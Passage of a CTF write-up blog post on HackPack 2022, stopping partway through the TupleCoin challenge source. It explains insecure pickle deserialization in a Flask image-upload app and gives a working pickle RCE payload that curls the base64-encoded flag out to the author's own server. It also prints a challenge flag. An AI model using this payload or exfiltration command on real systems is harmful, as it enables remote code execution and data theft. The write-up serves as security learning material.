<!doctype html><html lang=en-us><head><meta charset=utf-8><meta http-equiv=content-type content="text/html"><meta name=viewport content="width=device-width,initial-scale=1"><title itemprop=name>Writeup: HackPackCTF-2022 | ev1lm0rty</title><meta property="og:title" content="Writeup: HackPackCTF-2022 | ev1lm0rty"><meta name=twitter:title content="Writeup: HackPackCTF-2022 | ev1lm0rty"><meta itemprop=name content="Writeup: HackPackCTF-2022 | ev1lm0rty"><meta name=application-name content="Writeup: HackPackCTF-2022 | ev1lm0rty"><meta property="og:site_name" content="ev1lm0rty"><meta name=description content="Shubham Arya (ev1lm0rty) — InfoSec geek, CTF player, and lover of automating boring stuff."><meta itemprop=description content="Shubham Arya (ev1lm0rty) — InfoSec geek, CTF player, and lover of automating boring stuff."><meta property="og:description" content="Shubham Arya (ev1lm0rty) — InfoSec geek, CTF player, and lover of automating boring stuff."><meta name=twitter:description content="Shubham Arya (ev1lm0rty) — InfoSec geek, CTF player, and lover of automating boring stuff."><meta property="og:locale" content="en-us"><meta name=language content="en-us"><link rel=alternate hreflang=en-us href=https://ev1lm0rty.com/posts/writeup-hackpack-2022/ title><meta property="og:type" content="article"><meta property="og:article:published_time" content=2022-04-11T12:26:56+0530><meta property="article:published_time" content=2022-04-11T12:26:56+0530><meta property="og:url" content="https://ev1lm0rty.com/posts/writeup-hackpack-2022/"><meta property="og:article:author" content="Shubham Arya"><meta property="article:author" content="Shubham Arya"><meta name=author content="Shubham Arya"><script type=application/ld+json>{"@context":"https://schema.org","@type":"Article","headline":"Writeup: HackPackCTF-2022","author":{"@type":"Person","name":"Shubham Arya"},"datePublished":"2022-04-11","description":"","wordCount":1602,"mainEntityOfPage":"https://ev1lm0rty.com/posts/writeup-hackpack-2022/","dateModified":"2022-04-11","image":{"@type":"ImageObject","url":""},"publisher":{"@type":"Organization","name":"ev1lm0rty"}}</script><meta name=generator content="Hugo 0.165.0"><meta property="og:url" content="https://ev1lm0rty.com/posts/writeup-hackpack-2022/"><meta property="og:site_name" content="ev1lm0rty"><meta property="og:title" content="Writeup: HackPackCTF-2022"><meta property="og:description" content="About Hello readers, I have regularly started playing CTFs on the weekends again. I hope this time that I’ll be regular.
Last weekend I played the HackPack2022 CTF. It was a really fun CTF and I learned a lot of things.
Out of all the challenges solved, I am posting the writeups of the most interesting ones. Enjoy !
Web: Imported Kimichi This challenge highlighted “insecure unpickling” bug . The challenge gave us a website which we can use for image upload and later viewing."><meta property="og:locale" content="en_us"><meta property="og:type" content="article"><meta property="article:section" content="posts"><meta property="article:published_time" content="2022-04-11T12:26:56+05:30"><meta property="article:modified_time" content="2022-04-11T12:26:56+05:30"><meta property="article:tag" content="Ctf"><meta property="article:tag" content="Writeup"><meta property="article:tag" content="Web"><meta property="article:tag" content="Android"><meta property="article:tag" content="Frida"><meta property="article:tag" content="Objection"><meta name=twitter:card content="summary"><meta name=twitter:title content="Writeup: HackPackCTF-2022"><meta name=twitter:description content="About Hello readers, I have regularly started playing CTFs on the weekends again. I hope this time that I’ll be regular.
Last weekend I played the HackPack2022 CTF. It was a really fun CTF and I learned a lot of things.
Out of all the challenges solved, I am posting the writeups of the most interesting ones. Enjoy !
Web: Imported Kimichi This challenge highlighted “insecure unpickling” bug . The challenge gave us a website which we can use for image upload and later viewing."><link rel=canonical href=https://ev1lm0rty.com/posts/writeup-hackpack-2022/><link href=/style.min.2d921c18cf1ec555ffc03d59a8adc211c402c68c930c27d6a0c306ab175a8d09.css rel=stylesheet><link href=/code-highlight.min.706d31975fec544a864cb7f0d847a73ea55ca1df91bf495fd12a177138d807cf.css rel=stylesheet><style>@font-face{font-family:jetbrainsmono nerd font;font-style:normal;font-weight:400;font-display:swap;src:url(/fonts/JetBrainsMonoNerdFontMono-Regular.ttf)format('truetype')}@font-face{font-family:jetbrainsmono nerd font;font-style:italic;font-weight:400;font-display:swap;src:url(/fonts/JetBrainsMonoNerdFontMono-Italic.ttf)format('truetype')}@font-face{font-family:jetbrainsmono nerd font;font-style:normal;font-weight:700;font-display:swap;src:url(/fonts/JetBrainsMonoNerdFontMono-Bold.ttf)format('truetype')}@font-face{font-family:jetbrainsmono nerd font;font-style:italic;font-weight:700;font-display:swap;src:url(/fonts/JetBrainsMonoNerdFontMono-BoldItalic.ttf)format('truetype')}html,body,button,input,select,textarea{font-family:jetbrainsmono nerd font,ui-monospace,sf mono,Consolas,Menlo,monospace;font-feature-settings:"calt" 1,"liga" 1}code,pre,kbd,samp,.highlight,.highlight pre{font-family:jetbrainsmono nerd font,ui-monospace,sf mono,Consolas,Menlo,monospace}</style><link rel=apple-touch-icon sizes=180x180 href=/favicon-source_hu_affadc7bfd44c36d.png><link rel=icon type=image/png sizes=96x96 href=/favicon-source_hu_6cb60be2845a0f9.png><link rel=icon type=image/png sizes=32x32 href=/favicon-source_hu_4cf353b39a856ce7.png><link rel="shortcut icon" href=/favicon.ico><meta name=theme-color content="#131418"><meta name=color-scheme content="light dark"></head><body data-theme=dark class=notransition><script src=/js/theme.min.8961c317c5b88b953fe27525839672c9343f1058ab044696ca225656c8ba2ab0.js integrity="sha256-iWHDF8W4i5U/4nUlg5ZyyTQ/EFirBEaWyiJWVsi6KrA="></script><div class=navbar role=navigation><nav class=menu aria-label="Main Navigation"><a href=https://ev1lm0rty.com/ class=logo><svg width="25" height="25" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-home"><title>Home</title><path d="M3 9l9-7 9 7v11a2 2 0 01-2 2H5a2 2 0 01-2-2z"/><polyline points="9 22 9 12 15 12 15 22"/></svg>
</a><input type=checkbox id=menu-trigger class=menu-trigger>
<label for=menu-trigger><span class=menu-icon><svg width="25" height="25" stroke="currentColor" fill="none" viewBox="0 0 14 14"><title>Menu</title><path stroke-linecap="round" stroke-linejoin="round" d="M10.595 7H3.40726"/><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 3.51488H3.49301"/><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 10.4851H3.49301"/><path stroke-linecap="round" stroke-linejoin="round" d="M.5 12.5V1.5c0-.552285.447715-1 1-1h11C13.0523.5 13.5.947715 13.5 1.5v11C13.5 13.0523 13.0523 13.5 12.5 13.5H1.5C.947715 13.5.5 13.0523.5 12.5z"/></svg></span></label><div class=trigger><ul class=trigger-container><li><a class=menu-link href=/>Home</a></li><li><a class="menu-link active" href=/posts/>Posts</a></li><li><a class=menu-link href=/tags/>Tags</a></li><li class=menu-separator><span>|</span></li></ul><a id=mode href=#><svg class="mode-sunny" width="21" height="21" viewBox="0 0 14 14" stroke-width="1"><title>LIGHT</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="7" y1=".5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1=".5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"/></g></svg>
<svg class="mode-moon" width="21" height="21" viewBox="0 0 14 14" stroke-width="1"><title>DARK</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="7" y1=".5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1=".5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"/></g></svg></a></div></nav></div><div class="wrapper post"><main class=page-content aria-label=Content><article><header class=header><h1 class=header-title>Writeup: HackPackCTF-2022</h1><div class=post-meta><time datetime=2022-04-11T12:26:56+05:30 itemprop=datePublished>11 Apr, 2022</time></div></header><details class=toc zgotmplz><summary><b>Table of Contents</b></summary><nav id=TableOfContents><ul><li><a href=#about>About</a></li><li><a href=#web--imported-kimichi>Web: Imported Kimichi</a></li><li><a href=#2-web-tuplecoin>2. Web TupleCoin</a></li><li><a href=#rev-3t-3nd-ur-hom3>Rev: 3T 3ND UR HOM3</a><ul><li><a href=#the-skiddie-way--using-objection>The Skiddie Way : Using Objection</a></li><li><a href=#pro-way-manual-function-override-using-frida>Pro Way: Manual function override using frida.</a></li></ul></li><li><a href=#conclusion>Conclusion</a></li></ul></nav></details><div class=page-content><h2 id=about>About</h2><p>Hello readers, I have regularly started playing CTFs on the weekends again. I hope this time that I&rsquo;ll be regular.</p><p>Last weekend I played the <a href=https://hackpack.club/ctf2022/>HackPack2022</a> CTF. It was a really fun CTF and I learned a lot of things.</p><p>Out of all the challenges solved, I am posting the writeups of the most interesting ones. Enjoy !</p><p><img src=/images/hackpack2022/Pasted%20image%2020220411204154.png alt></p><h2 id=web--imported-kimichi>Web: Imported Kimichi</h2><p>This challenge highlighted &ldquo;insecure unpickling&rdquo; bug . The challenge gave us a website which we can use for image upload and later viewing.</p><p>It also provided with the app&rsquo;s source code.
here it is.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-python data-lang=python><span class=line><span class=cl><span class=kn>import</span> <span class=nn>uuid</span>
</span></span><span class=line><span class=cl><span class=kn>from</span> <span class=nn>flask</span> <span class=kn>import</span> <span class=o>*</span>
</span></span><span class=line><span class=cl><span class=kn>from</span> <span class=nn>flask_bootstrap</span> <span class=kn>import</span> <span class=n>Bootstrap</span>
</span></span><span class=line><span class=cl><span class=kn>import</span> <span class=nn>pickle</span>
</span></span><span class=line><span class=cl><span class=kn>import</span> <span class=nn>os</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>app</span> <span class=o>=</span> <span class=n>Flask</span><span class=p>(</span><span class=vm>__name__</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>Bootstrap</span><span class=p>(</span><span class=n>app</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>app</span><span class=o>.</span><span class=n>secret_key</span> <span class=o>=</span> <span class=s1>&#39;sup3r s3cr3t k3y&#39;</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>ALLOWED_EXTENSIONS</span> <span class=o>=</span> <span class=nb>set</span><span class=p>([</span><span class=s1>&#39;png&#39;</span><span class=p>,</span> <span class=s1>&#39;jpg&#39;</span><span class=p>,</span> <span class=s1>&#39;jpeg&#39;</span><span class=p>])</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>images</span> <span class=o>=</span> <span class=nb>set</span><span class=p>()</span>
</span></span><span class=line><span class=cl><span class=n>images</span><span class=o>.</span><span class=n>add</span><span class=p>(</span><span class=s1>&#39;bibimbap.jpg&#39;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>images</span><span class=o>.</span><span class=n>add</span><span class=p>(</span><span class=s1>&#39;galbi.jpg&#39;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>images</span><span class=o>.</span><span class=n>add</span><span class=p>(</span><span class=s1>&#39;pickled_kimchi.jpg&#39;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=nd>@app.route</span><span class=p>(</span><span class=s1>&#39;/&#39;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=k>def</span> <span class=nf>index</span><span class=p>():</span>
</span></span><span class=line><span class=cl>    <span class=k>return</span> <span class=n>render_template</span><span class=p>(</span><span class=s2>&#34;index.html&#34;</span><span class=p>,</span> <span class=n>images</span><span class=o>=</span><span class=n>images</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=nd>@app.route</span><span class=p>(</span><span class=s1>&#39;/upload&#39;</span><span class=p>,</span> <span class=n>methods</span><span class=o>=</span><span class=p>[</span><span class=s1>&#39;GET&#39;</span><span class=p>,</span> <span class=s1>&#39;POST&#39;</span><span class=p>])</span>
</span></span><span class=line><span class=cl><span class=k>def</span> <span class=nf>upload</span><span class=p>():</span>
</span></span><span class=line><span class=cl>    <span class=k>if</span> <span class=n>request</span><span class=o>.</span><span class=n>method</span> <span class=o>==</span> <span class=s1>&#39;POST&#39;</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=n>image</span> <span class=o>=</span> <span class=n>request</span><span class=o>.</span><span class=n>files</span><span class=p>[</span><span class=s2>&#34;image&#34;</span><span class=p>]</span>
</span></span><span class=line><span class=cl>        <span class=k>if</span> <span class=n>image</span> <span class=ow>and</span> <span class=n>image</span><span class=o>.</span><span class=n>filename</span><span class=o>.</span><span class=n>split</span><span class=p>(</span><span class=s2>&#34;.&#34;</span><span class=p>)[</span><span class=o>-</span><span class=mi>1</span><span class=p>]</span><span class=o>.</span><span class=n>lower</span><span class=p>()</span> <span class=ow>in</span> <span class=n>ALLOWED_EXTENSIONS</span><span class=p>:</span>
</span></span><span class=line><span class=cl>            <span class=c1># special file names are fun!</span>
</span></span><span class=line><span class=cl>            <span class=n>extension</span> <span class=o>=</span> <span class=s2>&#34;.&#34;</span> <span class=o>+</span> <span class=n>image</span><span class=o>.</span><span class=n>filename</span><span class=o>.</span><span class=n>split</span><span class=p>(</span><span class=s2>&#34;.&#34;</span><span class=p>)[</span><span class=o>-</span><span class=mi>1</span><span class=p>]</span><span class=o>.</span><span class=n>lower</span><span class=p>()</span>
</span></span><span class=line><span class=cl>            <span class=n>fancy_name</span> <span class=o>=</span> <span class=nb>str</span><span class=p>(</span><span class=n>uuid</span><span class=o>.</span><span class=n>uuid4</span><span class=p>())</span> <span class=o>+</span> <span class=n>extension</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>            <span class=n>image</span><span class=o>.</span><span class=n>save</span><span class=p>(</span><span class=n>os</span><span class=o>.</span><span class=n>path</span><span class=o>.</span><span class=n>join</span><span class=p>(</span><span class=s1>&#39;./images&#39;</span><span class=p>,</span> <span class=n>fancy_name</span><span class=p>))</span>
</span></span><span class=line><span class=cl>            <span class=n>flash</span><span class=p>(</span><span class=s2>&#34;Successfully uploaded image! View it at /images/&#34;</span> <span class=o>+</span> <span class=n>fancy_name</span><span class=p>,</span> <span class=s2>&#34;success&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>            <span class=k>return</span> <span class=n>redirect</span><span class=p>(</span><span class=n>url_for</span><span class=p>(</span><span class=s1>&#39;upload&#39;</span><span class=p>))</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>        <span class=k>else</span><span class=p>:</span>
</span></span><span class=line><span class=cl>            <span class=n>flash</span><span class=p>(</span><span class=s2>&#34;An error occured while uploading the image! Support filetypes are: png, jpg, jpeg&#34;</span><span class=p>,</span> <span class=s2>&#34;danger&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>            <span class=k>return</span> <span class=n>redirect</span><span class=p>(</span><span class=n>url_for</span><span class=p>(</span><span class=s1>&#39;upload&#39;</span><span class=p>))</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>    <span class=k>else</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=k>return</span> <span class=n>render_template</span><span class=p>(</span><span class=s2>&#34;upload.html&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=nd>@app.route</span><span class=p>(</span><span class=s1>&#39;/images/&lt;filename&gt;&#39;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=k>def</span> <span class=nf>display_image</span><span class=p>(</span><span class=n>filename</span><span class=p>):</span>
</span></span><span class=line><span class=cl>    <span class=k>try</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=n>pickle</span><span class=o>.</span><span class=n>loads</span><span class=p>(</span><span class=nb>open</span><span class=p>(</span><span class=s1>&#39;./images/&#39;</span> <span class=o>+</span> <span class=n>filename</span><span class=p>,</span> <span class=s1>&#39;rb&#39;</span><span class=p>)</span><span class=o>.</span><span class=n>read</span><span class=p>())</span>
</span></span><span class=line><span class=cl>    <span class=k>except</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=k>pass</span>
</span></span><span class=line><span class=cl>    <span class=k>return</span> <span class=n>send_from_directory</span><span class=p>(</span><span class=s1>&#39;./images&#39;</span><span class=p>,</span> <span class=n>filename</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=k>if</span> <span class=vm>__name__</span> <span class=o>==</span> <span class=s2>&#34;__main__&#34;</span><span class=p>:</span>
</span></span><span class=line><span class=cl>    <span class=n>app</span><span class=o>.</span><span class=n>run</span><span class=p>(</span><span class=n>host</span><span class=o>=</span><span class=s1>&#39;0.0.0.0&#39;</span><span class=p>)</span>
</span></span></code></pre></div><p>Looking at the source code, we deduce that the app is checking for image extension and then uploading it to <code>/images/</code> directory with a random name.</p><p>The interesting part is in the <code>/image/&lt;filename></code> route</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-python data-lang=python><span class=line><span class=cl><span class=nd>@app.route</span><span class=p>(</span><span class=s1>&#39;/images/&lt;filename&gt;&#39;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=k>def</span> <span class=nf>display_image</span><span class=p>(</span><span class=n>filename</span><span class=p>):</span>
</span></span><span class=line><span class=cl>    <span class=k>try</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=n>pickle</span><span class=o>.</span><span class=n>loads</span><span class=p>(</span><span class=nb>open</span><span class=p>(</span><span class=s1>&#39;./images/&#39;</span> <span class=o>+</span> <span class=n>filename</span><span class=p>,</span> <span class=s1>&#39;rb&#39;</span><span class=p>)</span><span class=o>.</span><span class=n>read</span><span class=p>())</span>
</span></span><span class=line><span class=cl>    <span class=k>except</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=k>pass</span>
</span></span><span class=line><span class=cl>    <span class=k>return</span> <span class=n>send_from_directory</span><span class=p>(</span><span class=s1>&#39;./images&#39;</span><span class=p>,</span> <span class=n>filename</span><span class=p>)</span>
</span></span></code></pre></div><p>as you can see right inside the &ldquo;try&rdquo; block , the app tries to load picked data from the image. And we all know that processing unsafe pickle data can lead to an rce. More about it <a href=https://medium.com/ochrona/python-pickle-is-notoriously-insecure-d6651f1974c9>here</a></p><p>So the steps to get an rce for this app is</p><ol><li>Create a image with insecure pickle data</li><li>Upload image</li><li>Visit image to make the app run <code>pickle.loads</code> and get an RCE.</li></ol><p>Here is the exploit I used + modified</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-python data-lang=python><span class=line><span class=cl><span class=kn>import</span> <span class=nn>pickle</span>
</span></span><span class=line><span class=cl><span class=kn>import</span> <span class=nn>base64</span>
</span></span><span class=line><span class=cl><span class=kn>import</span> <span class=nn>os</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=k>class</span> <span class=nc>RCE</span><span class=p>:</span>
</span></span><span class=line><span class=cl>    <span class=k>def</span> <span class=nf>__reduce__</span><span class=p>(</span><span class=bp>self</span><span class=p>):</span>
</span></span><span class=line><span class=cl>        <span class=n>cmd</span> <span class=o>=</span> <span class=p>(</span><span class=s1>&#39;curl http://&lt;my-aws-ip&gt;/$(cat flag.txt | base64)&#39;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>        <span class=k>return</span> <span class=n>os</span><span class=o>.</span><span class=n>system</span><span class=p>,</span> <span class=p>(</span><span class=n>cmd</span><span class=p>,)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=k>if</span> <span class=vm>__name__</span> <span class=o>==</span> <span class=s1>&#39;__main__&#39;</span><span class=p>:</span>
</span></span><span class=line><span class=cl>    <span class=n>pickled</span> <span class=o>=</span> <span class=n>pickle</span><span class=o>.</span><span class=n>dumps</span><span class=p>(</span><span class=n>RCE</span><span class=p>())</span>
</span></span><span class=line><span class=cl>    <span class=n>f</span> <span class=o>=</span> <span class=nb>open</span><span class=p>(</span><span class=s2>&#34;exploit.png&#34;</span> <span class=p>,</span> <span class=s2>&#34;wb&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>    <span class=n>f</span><span class=o>.</span><span class=n>write</span><span class=p>(</span><span class=n>pickled</span><span class=p>)</span>
</span></span><span class=line><span class=cl>    <span class=n>f</span><span class=o>.</span><span class=n>close</span><span class=p>()</span>
</span></span></code></pre></div><p>This creates an image <code>exploit.png</code> which will cat the output of <code>flag.txt</code> (i just guessed it would be flag.txt, this way i bypassed the need for a reverse shell) and then curl my aws ip with the base64 encoded flag as a path.</p><p>Starting up a listener on AWS and uploading the file, waiting for a few seconds and we will get a response like this</p><p><img src=/images/hackpack2022/Pasted%20image%2020220411111141.png alt></p><p>base64 decode and we get the flag
<img src=/images/hackpack2022/Pasted%20image%2020220411111237.png alt></p><blockquote><p><strong>Note</strong>
Later the flag was changed due to some issues, so I had to exploit this again with the same exploit, and it worked.
The new flag was flag{4nd_h3r3_1_w45_th1nk1ng_v1n3g4r_w45_s4n1t4ry}</p></blockquote><hr><h2 id=2-web-tuplecoin>2. Web TupleCoin</h2><p>This challenge highlighted the &ldquo;insecure token generation&rdquo; bug.</p><p><strong>TLDR</strong></p><ol><li>Visit robots.txt</li><li>Get source code from <code>wget /app/bckup</code></li><li>Run exploit.py :)</li></ol><p>Here is the description for the bounty page of the website</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-fallback data-lang=fallback><span class=line><span class=cl># Bug Bounty
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>Can you steal Tuco&#39;s TuCos? If you can, we have a prize for you!!
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>Things you should know about Tuco before you begin:
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>-   His account number is 314159265, and you can&#39;t have it.
</span></span><span class=line><span class=cl>-   He absolutely _hates_ robots, especially ones from Silicon Valley.
</span></span><span class=line><span class=cl>-   He fights as savagely as he eats chicken. Once glance at his soiled napkin and his enemies run screaming.
</span></span></code></pre></div><p>So to create an account, we just have to simply use any random integer except tuco&rsquo;s account number i.e 314159265. If we use tuco&rsquo;s account number, we get an error.</p><ul><li>Create page
<img src=/images/hackpack2022/Pasted%20image%2020220411112743.png alt></li></ul><p>To transfer funds, we can visit the transfer page. Requests and response shown on the right side.</p><ul><li>Transfer page
<img src=/images/hackpack2022/Pasted%20image%2020220411112652.png alt></li></ul><p>And finally to certify the transaction, the app calls <code>/api/transaction/commit</code> , as can be seen on the right side.</p><ul><li>Certify
<img src=/images/hackpack2022/Pasted%20image%2020220411112842.png alt></li></ul><p>Here we can see the source code for better understanding of what&rsquo;s happening behind the scenes.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-python data-lang=python><span class=line><span class=cl><span class=kn>from</span> <span class=nn>__future__</span> <span class=kn>import</span> <span class=n>annotations</span>
</span></span><span class=line><span class=cl><span class=kn>import</span> <span class=nn>hmac</span>
</span></span><span class=line><span class=cl><span class=kn>import</span> <span class=nn>math</span>
</span></span><span class=line><span class=cl><span class=kn>import</span> <span class=nn>os</span>
</span></span><span class=line><span class=cl><span class=kn>import</span> <span class=nn>secrets</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=kn>from</span> <span class=nn>fastapi</span> <span class=kn>import</span> <span class=n>FastAPI</span><span class=p>,</span> <span class=n>HTTPException</span>
</span></span><span class=line><span class=cl><span class=kn>from</span> <span class=nn>fastapi.responses</span> <span class=kn>import</span> <span class=n>RedirectResponse</span>
</span></span><span class=line><span class=cl><span class=kn>from</span> <span class=nn>fastapi.staticfiles</span> <span class=kn>import</span> <span class=n>StaticFiles</span>
</span></span><span class=line><span class=cl><span class=kn>from</span> <span class=nn>pydantic</span> <span class=kn>import</span> <span class=n>BaseModel</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>SECRET_KEY</span> <span class=o>=</span> <span class=n>secrets</span><span class=o>.</span><span class=n>token_bytes</span><span class=p>(</span><span class=mi>32</span><span class=p>)</span>    <span class=c1># random each time we run</span>
</span></span><span class=line><span class=cl><span class=n>TUCO_ACCT_NUM</span> <span class=o>=</span> <span class=mi>314159265</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>FLAG_FILE</span> <span class=o>=</span> <span class=n>os</span><span class=o>.</span><span class=n>environ</span><span class=o>.</span><span class=n>get</span><span class=p>(</span><span class=s2>&#34;TUPLECOIN_FLAG_FILE&#34;</span><span class=p>,</span> <span class=s2>&#34;flag.txt&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=k>try</span><span class=p>:</span>
</span></span><span class=line><span class=cl>    <span class=k>with</span> <span class=nb>open</span><span class=p>(</span><span class=n>FLAG_FILE</span><span class=p>)</span> <span class=k>as</span> <span class=n>fd</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=n>FLAG</span> <span class=o>=</span> <span class=n>fd</span><span class=o>.</span><span class=n>read</span><span class=p>()</span><span class=o>.</span><span class=n>strip</span><span class=p>()</span>
</span></span><span class=line><span class=cl><span class=k>except</span><span class=p>:</span>
</span></span><span class=line><span class=cl>    <span class=n>FLAG</span> <span class=o>=</span> <span class=s2>&#34;we has a fake flag for you, but it won&#39;t get you points at the CTF...&#34;</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>app</span> <span class=o>=</span> <span class=n>FastAPI</span><span class=p>()</span>
</span></span><span class=line><span class=cl><span class=n>APP_DIST_DIR</span> <span class=o>=</span> <span class=n>os</span><span class=o>.</span><span class=n>path</span><span class=o>.</span><span class=n>join</span><span class=p>(</span><span class=n>os</span><span class=o>.</span><span class=n>path</span><span class=o>.</span><span class=n>dirname</span><span class=p>(</span><span class=n>os</span><span class=o>.</span><span class=n>path</span><span class=o>.</span><span class=n>dirname</span><span class=p>(</span><span class=n>os</span><span class=o>.</span><span class=n>path</span><span class=o>.</span><span class=n>abspath</span><span class=p>(</span><span class=vm>__file__</span><span class=p>))),</span> <span class=s2>&#34;client&#34;</span><span class=p>,</span> <span class=s2>&#34;dist&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>app</span><span class=o>.</span><span class=n>mount</span><span class=p>(</span><span class=s2>&#34;/app&#34;</span><span class=p>,</span> <span class=n>StaticFiles</span><span class=p>(</span><span class=n>directory</span><span class=o>=</span><span class=n>APP_DIST_DIR</span><span class=p>),</span> <span class=n>name</span><span class=o>=</span><span class=s2>&#34;static&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=k>class</span> <span class=nc>Balance</span><span class=p>(</span><span class=n>BaseModel</span><span class=p>):</span>
</span></span><span class=line><span class=cl>    <span class=n>acct_num</span><span class=p>:</span> <span class=nb>int</span>
</span></span><span class=line><span class=cl>    <span class=n>num_tuco</span><span class=p>:</span> <span class=nb>float</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>    <span class=k>def</span> <span class=nf>serialize</span><span class=p>(</span><span class=bp>self</span><span class=p>)</span> <span class=o>-&gt;</span> <span class=nb>bytes</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=k>return</span> <span class=p>(</span><span class=nb>str</span><span class=p>(</span><span class=bp>self</span><span class=o>.</span><span class=n>acct_num</span><span class=p>)</span> <span class=o>+</span> <span class=s1>&#39;|&#39;</span> <span class=o>+</span> <span class=nb>str</span><span class=p>(</span><span class=bp>self</span><span class=o>.</span><span class=n>num_tuco</span><span class=p>))</span><span class=o>.</span><span class=n>encode</span><span class=p>()</span>
</span></span><span class=line><span class=cl>    
</span></span><span class=line><span class=cl>    <span class=k>def</span> <span class=nf>sign</span><span class=p>(</span><span class=bp>self</span><span class=p>,</span> <span class=n>secret_key</span><span class=p>:</span> <span class=nb>bytes</span><span class=p>)</span> <span class=o>-&gt;</span> <span class=n>CertifiedBalance</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=k>return</span> <span class=n>CertifiedBalance</span><span class=o>.</span><span class=n>parse_obj</span><span class=p>({</span>
</span></span><span class=line><span class=cl>            <span class=s2>&#34;balance&#34;</span><span class=p>:</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>                <span class=s2>&#34;acct_num&#34;</span><span class=p>:</span> <span class=bp>self</span><span class=o>.</span><span class=n>acct_num</span><span class=p>,</span>
